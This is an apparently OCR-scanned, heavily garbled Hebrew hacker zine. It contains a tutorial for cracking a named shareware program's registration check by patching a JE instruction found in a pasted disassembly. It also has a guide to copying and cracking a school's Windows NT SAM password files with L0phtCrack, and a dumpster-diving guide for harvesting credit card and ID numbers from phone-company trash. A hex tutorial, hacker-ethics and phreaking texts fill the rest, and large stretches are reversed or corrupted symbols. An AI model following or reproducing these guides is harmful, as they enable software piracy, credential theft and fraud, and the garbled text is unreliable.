3 .הלאוו !תיבב םכתוא ולגיש םיצור אלו רפס תיבב בשחמהמ ןחבמ םתבנג .
.םירחא םירבד הברה הברה דועו
&&&&&&&&&&&&&&&&&&&&&
. הז תא ולגי אלש חוטב
&&&&&&&&&&&&&&&&&&&&&
.הנכותה לש תוכיאבו םתבתכ #יא יולת הז ! הז תא ולגי אלש חיטבהל לוכי אל ינא ועמשת
ש תרמא לשמל !בוט אל הז חווטב דחא ות התוא הזיזמו תוא תחקולש הנכות ובתכת םא B #ופהי
ל & .
++:
.חווטב קוחרו #בוסמ רתויש המכ הז תא תושעל וסנת !רחא והשמ םא לבא תולגל לק שממ הז
ש לשמל " היהי 8 .הזכ והשמ וא
םכל וצרפי אלש חיטבהל לוכי אל ינאש ומכ !םינפב המ ולגי אלש חיטבהל בוש לוכי אל ינא
בשחמל
לוכי אל רחא דחא ףאו ינא לבא וספתי דימת אל !רתאל וצרפת םא םכתא וספתי אלש וא והשיתמ
חיטבהל
.אלש
.ןוכיס לש ןיינע הז !רמוא ינא המ םיניבמ
הנכותה תא וחק זא תויעב םכל שי םאו !םתבתכ םתאש תונכות םא קר ודבעת תישיאה יתעדל
!הטמל שיש
.הלש הנבמה תא הנשתו
םכלש בשחמה תא תחקל אובי רטוש הזיאש יוכיס שיש םיעדוי םתא םא םייחב לבא !םייחב לבא
!םוי הזיא
.תוקופד תונכותו תובותכ תונכותב ושמתשת לא
&&&&&&&&
. םיקניל
&&&&&&&&
-$ ילש טסקטב דחוימ המ לבא !תשרב רוח לכב אוצמל רשפא הנפצהו דודיק לע םירתא ; .
אל( םכח דואמ םדא ןב יע הבתכנש !הנפצה תנכות םצעב איהש הנכותל רושיק הפ םכל ןתונ ינא
.)ינא
.התיא ולבתו התוא ולפמקת !התוא וחק םיצור םתא םא זא
$ ףיכל םיקניל המכ תאז לכ
www%astalaVista%co4
hack%bo'%sk
blacksun%bo'%sk
By Pirs¡I]ng
++=
ילמיצדסקה סיסב הרמה *
$ תאמ 1eos
בושח לבא ! לודג רופיס אל . #פהלו ינורשעל ילמיצדסקה סיסבמ רימהל #יא דמלת הז #ירדמב
סיסב לש קנע #ירדממ קלח קר אוה הזה #ירדמה .דיתעב רתוי םיבכרומ םירבד עצבל ידכ עדתש
חוכ יל היהי םא ןיכהל #ישמי ינאש ילמיצדסקה ):
5 דבלב #יילע ושומישל תוירחאה ' דבלב דומיל יכרוצל בתכנ הז #ירדמ6
"הללאי
. ילמיצדסקה הז המ
סיסב אוה ילמיצדסקה 1' םילעמ ותואש םרוגה אוה סיסב ןכבו לאוש התא סיסב הז המ !
ה ומכ הז סיסב הטושפ תיטמתמ הרוצב לבא אשונהמ הטוס תצק ינאש עדוי ינא .הקזחב X $ ןאכ
x
A
הו A סיסב אוה ילמיצדסקה ' ןוכנ תנבה םא ןכ זא . ולש #ירעמה אוה 1' -ה ו A אוה
.הפל בושו תוקזח דמלת !ולש #ירעמה
( ילמיצדסקה הלימל שוריפ ייקוא Hex23e.,42/ ' תינווימ םצעב אוה ) HEXA הזש ' ו
DEC5MAL הזש 1$ סיסב ' ונלוכל רכומה סיסבה אוה ילמיצד ' 1$ םג שי ןכ ומכו .ינורשע !
סיסב ' יראניב סיסבה תא 2 בשחמש הדבועה ללגב וב םישמתשמו רתויב יסיסבה סיסבה אוהש
ןכלו קולדו יובכ לש םיילמשח תותוא קר טולקל לוכי $ ו 1 הז סיסבב םידיחיה םירפסמה םהש
םושמ םירבד דועו תודוקפ תונשל ידכ םישמתשמ ילמיצדסקה ה סיסבב .בשחמל םירבעומ
םירפסמל תומגרותמ הב תודוקפה בור יכ )רלבמסא( ףס תפש #רד הדובעל חונ אוהש הדבועה
. )רלבמסא #ירדמב םיטרפ דוע( תיסחי םיטושפ םיילמיצדסקה
הריפס תויש
$ #כ רפוס התא ליגר רפוס התא רשאכש ןוכנ וישכע ! בוט
1 ! 2 ! 3 ! & ! ! ! ' ! 6 ! ( ! 9 ( 10 ...
.תילמיצדה וא תינורשעה הטישה םג תארקנה תלבוקמה הריפסה תטיש תאז
תא יתטלבה המל וישכע ייקוא * ו 1$ דוע לבקמ רפסמה םצעב תאזה הדוקנבש םושמ תאז " .
דע םירפוס ונא ינורשעבש ומכ . ילמיצדסקה סיסבב םג #כ .שדחמ ספאתמו לאמש דצמ הרפס *
תורשעל םיפיסומ זאו 1 רבד הזכ ןיא תיטרואית הניחבמש םושמ תאזו( תודיחיה תא םיספאמו
. )תורשע דחא שי אלא תודחא רשע
דע רפוס התא ' המוד הז ילמיצדסקהב ! רוציקב 15 קר תילאמש הרפסל דחא ףיסומ זאו
לש תולופכל הווש תילאמשה הרפסה ילמיצדסקהבש 1' לש תולופכל אלו 1$ .
דע םירפוס ילמיצדסקהב וישכע .ןיבת טעמ דוע ארונ אל ! תנבה אל * מ זאו ליגרכ 1$ דעו 1!
$ןמקלדכ תויתוא םנשי
ילמיצדסקה * ינורשע
1 * 1
2 * 2
3 * 3
4 * 4
5 * 5
6 * 6
7 * 7
8 * 8
9 * 9
10 * A
11 * B
12 * C
13 * D
14 * E
++J
15 * F
LE# #HE "AME %E"5N "
.לק רתוי הז יכ ינורשעל ילמיצדסקה מ רימהל ליחתנ אוב זא #לוה הז #יא תנבהש דיגנ
רפסמה תא תגציימש האבה הלבטב לכתסה בוט 12 $ )ינורשע( ליגרה סיסבב
1 2
1$$$$$$ 1$$$$$ 1$$$$ 1$$$ 1$$ 1$ 1
רפסמה גצומ תאזה הלבטב ןיבהל תקפסה יאדוובש ומכ +9 ל קלוחמ אוה רשאכ + דועו תורשע 9
לפכנ םג #כ הלאמש הנותחתה הלבטב םיכלוהש לככש בל םיש םג ןכו . לקו טושפ ! תודיחי
ש הככ . ולש הקזח ' ומצעב רשע לש הלופכ אוה רפסמ לכש רמולכ ! רשעב רפסמה + רשע הז
תקזחב * תקזחב רשע הז האמו ! דחא תקזחב רשע הז רשעו 9 .

$ ילמיצדסקהב םג רופיס ותוא
'!!3' &$*' 2!' 1' 1
ש בל םיש( ילמיצדסקהב רפסמה תא בותכל הסננו דיגנ 12 אוה C רומא הז )הלעמל הלבטה יפל
$#כ תוארהל
C
'!!3' &$*' 2!' 1' 1
.ומצעב ותוא םילפוכ םצעב יכ
רפסמה $ לודג רתוי הפיט רפסמ לע #לנ אוב 2A הז ינורשעבש &&
תא קלחל רשפא םצעב ! הארתו אוב .המל 2A $ הככ
2 A
'!!3' &$*' 2!' 1' 1
חקינ ' ינורשעב םישועש יפכ קוידב השענ המ האצותה תא לבקל ליבשב . ןאכ שי םצעב המ זא
תא +9 םצעב הז םדוקה + 0 +* דועו 9 0 + .
רפסמה הפ זא 9" היהי הז 9 0 +J הזש 39 דועו " i + F " םצעב הז +*
ל הווש הז זא + 0 +* $ רמולכ 39 - +* ל הווש הזש :9
$ #ל רוזעי הזה טוטרשה ילוא . #בוסמ
תא חקינ :9 $ל הווש אוהש הלגנו ינורשעב
: 0 +* & :*
9 0 + & 9
:* - 9 & :9
תא חקינ וישכע 2A $ל הווש אוהש הלגנו ילמיצדסקהב
9 0 +J & 39
" n +* הלבטה יפל '
+* 0 + & +*
++N
39 - +* & :9
$ תורחא תואמגוד חקו אוב
.J" &
" i + n +*
J 0 +J & ;J
. 0 9=J & 9*:.
+* - ;J - 9*:. & 9+=:
$ רמולכ .J" n 9+=:
4C91
+ 0 + & +
; 0 +J & +::
& i 9=J n 3*N9
: 0 :*;J & +J3.:
+ - +:: - 3*N9 - +J3.: & +;J*+
רמולכ :&;+ n +;J*+
ילמיצדסקהל ינורשעמ הרמה
$ 'ג התיכ תא תרבעו הלעמלש קלחה תא תנבה םא לק תויהל רומא קסעה וישכע
ב רפסמה תא קלחל !טושפ הז םישועש המ ילמיצדסקהל ינורשעמ רימהל ליבשב +J -ב המל ! +J .
רבחל ( דחיב םהלש רושרש ןכמ רחאלו תורפס קוריפ טושפ אוה ןאכ רבסויש הרמהה ןורקע
דיגנ ' םתוא + ו 9 תויהל וכפהי +9 רפסמל רוזחנ רדסב ! ) +9 $ונלש ינורשעה
' ב ותוא קלחת +* לבקתו
+9 ( +* & + ( 9 )
+ ( +* & * ( + )
...רדסב ;;l רפסמה קוריפ ' יתרבסהש המ קוידב אוה הלעמל הרוקש המ ! םולכ תנבה אלש
.... ומצע רפסמה איה ולש תיראשהו
+9 יקלח +* תלביק + תיראשו 9 כ םוגרתל ןתינש המ + ו תורשע 9 תודיחי
-ה תא תרמש ןכמ רחאל 9 ה תא תקלחו תיראשה תאז + ב תקליחש תלביקש +* םדוקממ
תלביקו * לש תיראשו + רמואש המ + .תורשע
9 ו תודיחי + ' תורשע +9
התא תינורשע הרמהב םצעב $ הטיש דוע הנה הככ תנבה אל םא ...הככ הז תא ריבסהל #בוסמ יד
קלחמ
' ב + * רפסמב לבקמ התאש דע * ( רשעב וילע תקליחש רפסמה תא תיראשבו + זאו )ונלש הרקמב
רבחמ התא ףסוותמש רפסמ לכו קלחל #ישממו רמוש התא תיראשה תא קלחמ התאש םעפ לכ
תיראשב הלחתהב תלביקש #כ רפסמל לאמשמ 9 #כ רחאו + דחא םתוא םישל( םתוא רשרש '
לבקתו )ינשה דיל +9
סיסבב דבוע רבדה #יא ייקוא +J .
$ אבה ינורשעה רפסמה דיגנ 99
++.
ינורשעב ונישעש המ קוידב . ותא השענ המ ב קלחנ וישכעש קר 16 'ב אלו 10 !
99 ( +J & + ( J )
+ ( +J & * ( + )
ייקוא J ' ו + תלביקו רשרש ' +J
$ תרחא תימגוד =.
=. ( +J & 3 ( +* )
3 ( +J & * ( 3 )
+* הז ילמיצדסקהב " אוה ףוסב לבקתיש המ 3"
קלחל הסנת רשאכ ןובשחמב שמתשמש ימל דואמ בושח רבד 58 ב 16 לבקת 3.625 םירבשב וא
3 ו 5 יקלח 8 הרוצב התוא בותכל ידכ תיראשה תא שפחמ התא רשאכש בל םישת וישכע (
ל הנכמה תא ךופהל בייח התא תינורשע 16 לש הנומהו הנכמה תא לופכל ונלש הרקמבש המ 5
יקלח 8 * ב 2 לבקת זאו 10 יקלח 16 אלו תיראשל הבושתה תאזו . 5 .
( יצח רבשה תא בותכל הצור התאש דיגנ ירה יכ ינורשעב םג לעופ ןורקיעה ( יללכ עדיל 1 יקלח 2
* ב הנכמהו הנומה תא לופכל בייח התא זא (רשע סיסב תחת אוה רשאכ ינורשעב ) 5 יכ( 2 % 5
ל הווש 10 לבקמ התא זאו ) 0.5 בותכל$ בייח התא יכ ילמיצדסקה ב םג הרוק קוידב רבד ותוא
סיסב תחת $רפסמה תא 16 .רחא סיסב תחת אלו
:םוכיס ירבד
סיסבמ רימהל #יא )תחלצה םא( תדמל הז #ירדמב +* סיסבל +J רופיס אל הזש עדוי ינא .#פהלו
ןבומכ! אלמ ןפואב רלבמסא דומלל טילחת םא #ל םלתשהל לוכי הזש הארת התא לבא לודג
םיחצפמה וליפא לבא םוקמ לכמ טעמכ דירוהל ןתינש םיסיסב ריממב שמתשהל טושפ רשפאש
בותכש ומכ םגו הארנכ רגתאמ רתוי הז יכ דבל הז םע קסעתהל רתוי םיגהונ רתויב םיסונמה
.םיבכרומ רתוי םירבדל סיסב הז הלחתהב
סיסבמ םירפסמ קלחל וא לופכל רסחל ! רבחל ןתינ דציכ בותכא )הסקה לע( ילש אבה #ירדמב +J
ל םימילשמהו םיילילשה םירפסמה תובישח לע םג דמלתו 9 סיסבב עדי לע #מתסמ #ירדמה(
יראניבY %
By Z'o(
++;
אמסיס תנגה לש ישעמ חוציפל ךירדמה
:תאמ Zeos
יל וריאשהש תועדוה תובקעב . גניקארקל עגונב בתוכ ינאש ינשה #ירדמה רבכ והז !םכל םולש
לכות שממש ליבשב םג ןכו הז #ירדמ תא בותכל יתטלחה אמסיס תנגה חוציפל עגונב םורופב
.תיתימא תינכות חצפלו תוסנתהל
םרגיש קזנ לכ וא השעתש תיקוח אל הלועפ לכ ! "דבלב דומיל יכרוצל רצונ #ירדמה $הרעה
הרוצב רבסומ #ירדמה !"דבלב #תוירחא לע הנה #ירדמה #מס לע תוליעפ לכ בקע #בשחמל
תישיאה #תוירחא לע הנה שומיש לש גוס לכמ האצותכ טוקנתש תיקוח אל הלועפ לכו תיטרואית
.אורקל קספה אנא חוור תורטמל חוציפה תא לצנל ןיינועמ התא םא .דבלב
קלח 1 עדיהו םילכה *
התא הזה #ירדמל זא ! בוט בייח םירפסמ דמלתש ףידע ...עקתת התא עדי ילב ! ילבמסאב עדי )"(
!םירגוא לע תצק עדתש ףידע ! הז #ירדמל יסיסב עדי קר( ןאכל רוזח זאו תצק טנרטניאב וא
.)םיסיסבו האוושה תויצקנופ
$םיצופנ יד םילכ םה שמתשנש םילכה
+ % 32 לארשיב תיב לכב הבוח הלועמ רלבמאסיד ):
9 % H!o"#s 7HEX WOR0SHOP סיסבב םיצבקה תא גיצמ( ילמיצדסקה #רוע )
1' .השקבב !רחא #רוע לכב בוט שמתשהל עדוי התא םא )
...טנרטניאב םוקמ לכב טעמכ םיצבקה תא גישהל ןתינ
קלח 2 הרמה *
%ורפל #יא וילע םידמלמש %ופנ יד %בוק יתאצמו גניקארק ירתאב יתרייס ! השק היהי אלש ליבשב
מ רתוי תחקל #ירצ אל ינוניבה חצפמלש הביבחו הלק שממ הנכות . ! .חצפל תוקד
$ םיארוק הנכותל S!ee$ L%$$&e P,2no האבה תבותכהמ התוא דירוהל ןתינו
tt89::www.ron,4;s,...o4: sw/,8,32.<,8
קלח 2 תכרעמ תועדוה תקידב *
ונל וחתפנ הנושארל הנכותה תא ונצרהש ירחא ! "הדובעל המידק 2 תבית הלחתהב $ םירבד
$ תרמואש העדוה
'o$e( )o* +*s$ s*,,&y yo*" *se" ID !-e. o"/e"%.0
1se" ID2 xxxx
ש xxxx לע %חלתש ירחא .#לש ןוישר רפסמה אוה O0 #מסמ #ל חתפי ORDER.#X# םג ןכו
תרתוכב םושר הבש #לש אמסיסה תא תשקבמה הבית E.$e" )o*" 34ss!o"/ םוקמו :
האיגש תעדוה #ל חתפיהל הרומאו #תעד לע הלועש רפסמ לכ יתוטש והשמ שקה .אמסיס סינכהל
םושר הבש )עיתפמ אל המכ(
'o$ 4 54&%/ ,4ss!o"/ םושר תרתוכבו
' 1se" ID xxxx S!ee$ L%$$&e 3%4.o
לע קלקה O0 .תינכותה לש האלמ אלה הסרגל סנכתו בוש
$ ןאכ ונל היה המ זא
( #ל קפנוהש יוהיז רפסמל םאתהב אמסיס םושרל םוקמ #ל החתפ תינכותה =ser 5D רחאלו )
אל רפסמ תמש התא #א ! יוהיז רפסמל אמסיסה תא םיוסמ םתירוגלא תועצמאב תוושהל ןכמ
. האיגש תעדוה תלביקו ןוכנ
קלח 3 דוקה תא םיקדוב *
תא חתפ $תינכותה #ותב הרוק המ הארנ אוב ! בוט W32 ה %בוק תא וב חתפו EXE לש
רמואש המ הנטק איה ' תאזה תינכותה תא אקווד יתרחב המל תוביסה תחא הנה...תינכותה
בוט הזו קסעתהל ןגלב תוחפ ונל היהי הארנכש . ): לע %חלנ אוב ' השענ המ וטלק וישכע
+9*
S6R'.REF הנוכנ אל הקידבה יכ ונל הארמש הרושה תא שפחנו )הספדהה לש רותפכה דיל(
$טפשמה תא רמולכ 'o$ 4 54&%/ ,4ss!o"/
$הזכ והשמ םכל חתפיהל רומאו וילע וצחל יפוי .ונאצמ
7 Re8e"e.9e 6o2 1SER32.:e$D&0I$e+6ex$A; O"/20000-
<
200401E54 E8EBBA0000 C4&& 0040D944
200401E59 E83EFEFFFF 94&& 00401C9C
200401E5E 85C0 $es$ e4x; e4x
200401E60 741E =e 00401E80
200401E62 6A30 ,*s- 00000030
• 3oss%>&e S$"%.0D4$4 Re8 8"o+ D4$4 O>= ?@AS!ee$ L%$$&e 3%4.oA
<
200401E64 68FCE14000 ,*s- 0040E1FC
• 3oss%>&e S$"%.0D4$4 Re8 8"o+ D4$4 O>= ?@A6-4.#s 8o" "e0%s$e"%.0(A
<
200401E69 68ADE14000 ,*s- 0040E1AD
200401E6E 53 ,*s- e>x
• Re8e"e.9e 6o2 1SER32.Bess40eBoxA; O"/20000-
<
200401E6F E812BB0000 C4&& 0040D986
200401E74 C70568E2400001000000 +o5 /!o"/ ,$" C0040E268D;
00000001
200401E7E EB1A =+, 00401E9A
• Re8e"e.9e/ >y 4 E1F.9o./%$%o.4& o" Go./%$%o.4& H*+, 4$ A//"ess2
<200401E60G
<
200401E80 6A30 ,*s- 00000030
• 3oss%>&e S$"%.0D4$4 Re8 8"o+ D4$4 O>= ?@AS!ee$ L%$$&e 3%4.oA
<
200401E82 68FCE14000 ,*s- 0040E1FC
• 3oss%>&e S$"%.0D4$4 Re8 8"o+ D4$4 O>= ?@A'o$ 4 54&%/ ,4ss!o"/(A
<
200401E87 68E3E14000 ,*s- 0040E1E3
200401E8C 53 ,*s- e>x
הארתו אוב זא ! רבדמ ינא םהילע םיעטקה תא אוצמל תחלצהו הזה ןגלבהמ תששואתהש ירחא
הרגישה יפל $הפ ונל הרוק המ
7 Re8e"e.9e 6o2 1SER32.:e$D&0I$e+6ex$A; O"/20000-
<
200401E54 E8EBBA0000 C4&& 0040D944 I היצקנופל האירקJ
200401E59 E83EFEFFFF 94&& 00401C9C Iהיצקנופל האירק J
+9+
200401E5E 85C0 $es$ e4x; e4x Eהאוושה ןחבמJ
200401E60 741E =e 00401E80 Iהווש םא הציפק( J
: 00401E62 6A30 ,*s- 00000030
םנשי & #רוע ישילש טפשמ .ןיינעמ אל ! היצקנופל םיארוק םייתשו דחא םיטפשמ ! םיטפשמ
םירגואה ינש ןיב םיוסמ ןחבמ EAX לש םתירוגלא חוציפ הז יכ ונל הנשמ #כ לכ אל הז לבא
( יעיברה טפשמב וליאו תעכ הז םע םיקסעתמ אל ונחנאו המסיסה )קוריב ןמוסמ םא הציפק הנשי
הז ' הווש JE וליא הרוק היה המ ! בושחנ אוב וישכע .החילצה המשרהה יכ תרמואש הרגישל
הדוקפהו האוושה ןחבמ השוע התייה תינכותה JE תמשרנ התייה תינכותה זא .םש התייה אל
""""התוא דימשנו #לנ אוב המידק הללאי זא .החלצהב
קלח 4 האוושהה תדוקפ לורנ *
תועצמאב האוושהה תדוקפ תא לרטנמ ינא הפ םג יכ הארת ילש ןושארה #ירדמה תא תארק םא
תדוקפ NOP
& NO OPERA#5ON תדוקפש תנבצעמו הנטנטק היעב שי לבא ! JE תדוקפו םיתב ינש תספות
NOP קר סינכנ ןכלו ! דחא טייב תספות 2 תודוקפ NOP .םדוקה #ירדמב ונישעש ומכ עברא אלו
תא אצמת אלו לבלבתתש ידכ $ירודיס רפסמ$ השעש ): תנכתמה לש תושפיל בל םיש
בוקע ושפ ...ילשש המל תווש אל ךלש רלבמאסידב תורושה ירפסמ םא גאדת לא (הרגישה
.ךלש $ירודיס רפסמ$ל םאתהב םתוא אצמתו )לוחכב םינמוסמ( שארבש תינכותה יפשמ ירחא
ב קודב זא W32 רפסמה תא #לש OFFSE# הדוקפה לש JE הז םא סחייתת לא !םעפ בוש( #לש
' ה אלל( ותוא תמשרש רחאלו )ילשל המוד אל H ונלש ילמיצדסקהה #רועל #ל ) HWOR0S .
תדוקפ תועצמאב הרושל %ופק המידק "O#O ו טלא( f! םיימעפ דלקהו תמשרש רפסמה לא )
*$ הדוקפה תאז( NOP ...%בוקה תא רומש . )ילמיצדסקהב
קלח 5 !!!רבג ינא !!יתחציפ ! יתחציפ *
היהת המשרהה שיקת רפסמ הזיא הנשמ אלש הארת ןוכנ לכה תישע םאו תינכותה תא ליעפת
תיבה לכב %ור ' #לש הנושארה תינכותה תא תחציפש #ב האג תישיא ינא ! בוט לזמ .תיקוח
יתחלצהש הנושארה םעפב יתישע ינאש ומכ "יתחציפ " יתחציפ קעצתו ):
תופש דומלל הז חצפמ ךתויהמ קלחש תעדל בייח התא חצפמ תויהלו ךישמהל הצור התא םא
גוס לכמ תינכות ךותב עצבתמש המ לכ לע הילש לבקל לכות זאו לכותש לככ דמל (תונוש תונכת
.גניקארקה לש תילכתה םצעב תאזו ךנוצר יפל התוא בתנלו הפש לכמו
' ךירדמהמ תינהנש הווקמ Zeos
+99
ב תואמסיס תצירפ Windows NT
"ןלהא
!4an .ןאכ
.המ זא
ןיקתהל טילחה רפס תיב 8inN# .ותייא וקנחיש ...יפוי .
.ןוכנ םתוא וקנחת םתאש בוט יכהו
.דייטצהל המב
$הבוח דויצ
טקסיד -
$תושר דויצ
טקסיד - N#-3$63
- N# Resource /it
$הככ זא
.תואמסיסה %בוק תא שפחל #יא
$הככ טושפ
הז םא 8inN# :%* .1 %בוקה תא ושפח !הטמו 3a4
הז םא 8inN#=%* %בוקה תא שפח !הלעמו 3a4
-ה והמ 3"M .
לש תוביתה ישאר 3"M םה 3ecurit) "ccounts Manager
.תונובשח תחטבא להנמ $תירבעב וא
.הזה %בוקה תא %ורפל תוטיש המכ שי
הטיש + הנכותה תא גישהל וסנת $ R!$,3/ טפוסורקימ לש !תאז הנכות !הצירפ תנכות אל תאז .
הז .טקסיד לע הלעפהה תכרעמ לש %וחנה עדימה לכ תא הבגמ !המצעב
.%בוקה תא גישהל תנמ לע הנכותב ושמתשה טושפ "תואמסיס םג ללוכ
הטיש 9 היקיתב תואצמנ תונכדועמ יכה תואמסיסה $ 8innt/3)ste439/&onQig .1 לע םה ןכ םג .
3a4 לע וא 3a4 .
.םשל השיג ןיא )םייתניב( ונחנאש המ !ליגר שמתשמל לבא
טקסידב ושמתשה טושפ "הגאד לא N#-3$63 םישוע םתאשכ Restart .
.טקסידל %בוקה תא קיתעהלו תאזה הירפסל סנכהל ולכות וישכע
הטיש 3 ב םג אצמנ תואמסיסה לש קתוע $ Registr) .וילא סנכהל לוכי אל ליגר שמתשמ לבא !
)טפוסורקימ תיבמ !בוש( הנכותב שמתשהל .תושעל רשפא המ RegBack%e'e המ N# Resource
/it .טקסידל תואמסיסה תא הקיתעמש
הטיש : $
.תולקב םירתוומ אלש הלאלו םיחמומל קר תדעוימ תאז הטיש 000
ה %בוקב 3waI לש 8inN# וב שפחל רשפא יא !בוש לבא "ליגר טסקטב תואמסיסה תונסחואמ
.וב תשמתשמ תכרעמה יכ
+93
ב םישמתשמ .םישוע המ N#-3$63 ל סנכהל ידכ $63 %בוקה תא םיקיתעמו 3waIQile%s)s
.קסיד דראהה לע רחא םוקמל
"םיריבעמ אל "םיקיתעמ $בל ומיש 00
ב םישמתשמשכ %בוקב םישפחמ טושפו סודניוול םיסנכנ NotePad .ותוא אורקל ידכ
הטישל + ! 9 ו 3 $
רשפא יאו תודדוקמ וכותב תואמסיסה .ותוא חצפל םיכירצ ונחנא !%בוקה תא ונל שישכ !וישכע
.הככ םהב שמתשהל
םשב הנכות םידירומ .םישוע המ 7*Iht&rack מ www%l*Iht%co4 הב תוארוהה ירחא םיבקועו
.חוציפה #ילהת תא ליחתהל #יא
תועיפומ תואמסיסהש ןמזב אורקל #ישמהל םתס וא תוחאל קיצהל !לותחה םע קחשל וכל וישכע
.םיכניע לומ טאל טאל
By E-man .
+9:
י$פע םירקאהה לש הקיתאה Razor\Oldhacker
~They don't care about us¨
Micheal 1ackson
+% םא ! יתימא היהת ! םדאב שיש הלפש יכה הגרדה הז עובצ תויהל - עובצ םעפ ףא היהת לא
רסמה תא ריבעהל הסנת וא זומרת לאו םינפב הז תא ול רומא תמא והשימל רמול הצור התא
םינפב קלחו דח תאז רומא ! םיזמרב t%
9% תרקישש ועדי תחא םעפ ! םירקש םיאנוש םישנא ללכב םייחבו גניקאהה םלועב - רקשת לא
הבר תונימא #ירצש גניקאהב דחוימב שיש הרבח לכמ #תוא ופיעי %
3% לש יארשא ירפסמ בונגת לא המגודל - םדאמ שוכר וא ףסכ םעפ ףא בונגת לא םישנא וא
םה םיבנגו םיאקיטילופ $ רש יצרא המלשש המרוכז . ערל םהב שמשתו םיקנב תונובשח %%%h!Y %
:% עדוי התאש םירבדה לאו םירחאמ תדמלש םירבדה לע דחא ףא ינפב אשנתת לא - אשנתת לא
שי דימת $ רוכז ! השוע הזה רפסהש ומכו #תוא ודמילש ומכ עדוי אלש ימ תא דמל אלא ללכב
לכל םניחב עדיה תא %יפהל הז םירקאהה לש הרטמה לכ ללכבו ! #ממ בוט רתוי עדויש והשימ
שרוד %
=% לעב תא רהזה בהוא #כ לכ אל התא ותואש רתאל %ורפל הצור התא םא - עצב כחא קרו רהזה
ילב רתאה תא %ורפ #ירבד תא השוע אל אוה םאו תשרהמ רתאה תא דירויש ול רומאו רתאה
המשא תושגר %
J% התא תשרבש אלא םייחב ומכ קוידב הרבח איה טנרטניאה לש הליהקהש רוכז - םדא ןב היהת
ארפ ומכ אלו םדא ןב ומכ גהנתת הז תורמלו ימונונא %
N%דובעל #ירצ דובכ ליבשב %
.% בושת רפעלו תאב רפעמ $ : רוכז " %
By Razor \ Old-Hacker
+9=
גניקירפ ' תמא , רקש
התמ גניקירפה תעפות $רקש%
רבעב התייהש המ אל איה !תססוג דיגהל רשפא !תיניצר הכיעדב איה גניקירפה תעפות $תמא%
רתוי תודבוע אל םירקירפ תוספוק $רקש XB6K3Y%
םינוכנה םיאנתה תחת תודבועש המכ שי לבא תודבוע אל תואספוקה לכ טעמכ $תמא%
גניקאהמ רתוי בינגמ(בוט גניקירפ $רקש%
ינשהמ רתוי בוט הזכ רבד ןיאו תבשחוממ תונמוא לש םיגוס םהינש !גניקירפ(גניקאה םג $תמא%
רוסאו ער רבד הז גניקירפ $רקש%
םירבד סורהל ןווכמו העטומ שומיש הזב םישוע םא קר רוסאו ער רבד הז גניקירפ $תמא%
ללכב הז תא #ירצ המל !גיקירפל שומיש ןיא $רקש p
שמתשמ התאש ןופלט תוכרעמ לע עדי #ל ןתונ אוהו דואמ ישומיש תויהל לוכי גניקירפ $תמא
םוי לכ םהב%
תואספוק קר אוה גניקירפ לש ירקיעה אשונה $רקש%
גניקירפל שדח אשונ-תת שי !השדח ןופלט תכרעמ תרצונ רשאכ םוי לכ $תמא,
השדח תכרעמ לע שדח עדי !התיא תושעל רשפא המו התיא דובעל #יא%
רתויב יתוחיטב אוה גניקירפ $רקש%
רהזיהל #ירצ דימת !והשלכ השעמ עוציב ןמזב למשחתתש יוכיס שי דימת !ןוכנ אל $תמא%
ספתיהל יוכיס יל ןיא !והשלכ גניקירפ השעמ השוע ינאשכ $רקש%
ל רשקתי !#תוא הארי והשימש יוכיס שי דימת !ןוכנ אל םג $תמא +** התוא לכואו ספתנ התאו %
יקוח אל הז גניקירפ $רקש%
תמא אקווד הז $תמא%
בוט רקירפ היהא ינא הזה טסקטה תא ארקא ינא םא $רקש%
םכישעמב רהזיהל #יאו גניקירפ לע עדימ טעמ םכל ריבסהל דעונ טסקטה !ןוכנ אל בוש $תמא%
By Prising
+9J
םירקירפל תולבזמב שופיח
םירקירפל תולבזימב שופיח
רוקמה רתאh www%ihc!net%org
טסקטב הערל שומיש לכל םיארחא אל רתאה תווצו ינא $תורעה%
טסקטב ראותמה תא עצבל ןיאו דבלב תוידומיל תורטמל אוה ןאכ רמוחה%
םירקירפל תולבזימב שופיח הז המ p
רשפא םהבש תומוקמב )הווקמ ינא ליעגמ רבד םושב אל( תוריינל שופיחל אוה הנווכה
ןופלטה תרבח ידרשמב רקיעב( םירקאה(םירקירפל עדימ אוצמלY%
אצמי ינא המ .יל המל p
תיקלח המישר הנה .םירקאהל םקלחו םירקירפל םקלח !םירבד הברה אוצמל רשפאh
i ןופלטה תרבח לש יוסינ ירפסמ םע תוריינ%
i םייוסמ רפסממ תוחישה רואית םע תוריינ%
i םינוש םישנא לש םיישיא םיטרפ ראשו תוהז-תדועת ירפסמ%
i תויקתיפ לע םירחא םישנא לש יארשא יסיטרכ ירפסמ%
i םהילע תעדל רומא אל התאש תשרל גויח ירפסמ%
#ירצ המp
////////
& ההכ עבצב לוכה( .םינשי םייסנכמ גוזו תונשי םיילענ !הכורא הנשי הצלוחY
& סנפ
& תוריינל לודג קית
& 8alkie #alkie
& ןיב( םירבח 9!J םע תיפצתב אצמנ דחא תוחפל ) walkie talkie
הז תא גישהל ידכ השוע ינא המ זא !יקואp
XXXXXXXXXXXXXXXXXXYYYYYYYYYYYYYYYYYYY
ןמזב )ירלולס ןופלט תורבח (קזב לש םידרשמ ףידע( וב שפחל הצור התאש םוקמל #ל לוכ םדוק
םילוענמ וא %וחב םירמוש שי םאו םיסנכנ הפיאמ !הארנ םוקמה #יא הארתו רואה%
הלבזימל סנכיתו םוקמל #ל !ןכמ רחאל הלילב%
המינפ לכתסתו םתוא חתפ !ינשה דיל דחא םילודג םיחפ ןומה הארת התא םש%
אצו קיתה #ותל תוריינ הברה חק זא תוריינ הז #ירצ התאש המו !ריינ אוה הארתש המ בור
םוקמהמ%
בוחרב לבז חפל םיבושח אלה םירבדה תא קורז !תחקלש המ לע לכתסת התיבה עיגמ התאשכ
#לש אל( והשלכY
תמאב םיינינעמה םירבדה תא חקו%
םירבדל הקוקז גניקירפה תניפ !יל חולשלו הז תא קורסל לכות שממ םיינינעמ םירבד אצמת םא
הלאכt
םא המ %%%
הלבזימב הייהשל םיצוריתh
m ןאכ ילש לגרודכה תא יתדביא%
m רוזחימל םוינימולא(תוריינ שפחמ ינא%
m םיעדמב ילש טקיורפל ןופלט יטוח #ירצ ינא%
m ןושיל םוקמ יל ןיא%
+9N
השוע התא המ םיניבמו #תוא םיספות םא !הרקמ לכב,
יניצר עשפ םושב אלו לובג תייצחב םשאומ תויהל לוכי התא%
םכלש דימת,
By AiTi
TNI BOX
#N, Bo'
nnnnnnn
ידי לע בתכנ ! Boba 34ith
0ersion ! :%*
jjj www%ihc!net%org rrr
הרעה
!!!!
דבלב תוידומיל תורטמל בתכנ הז טסקט
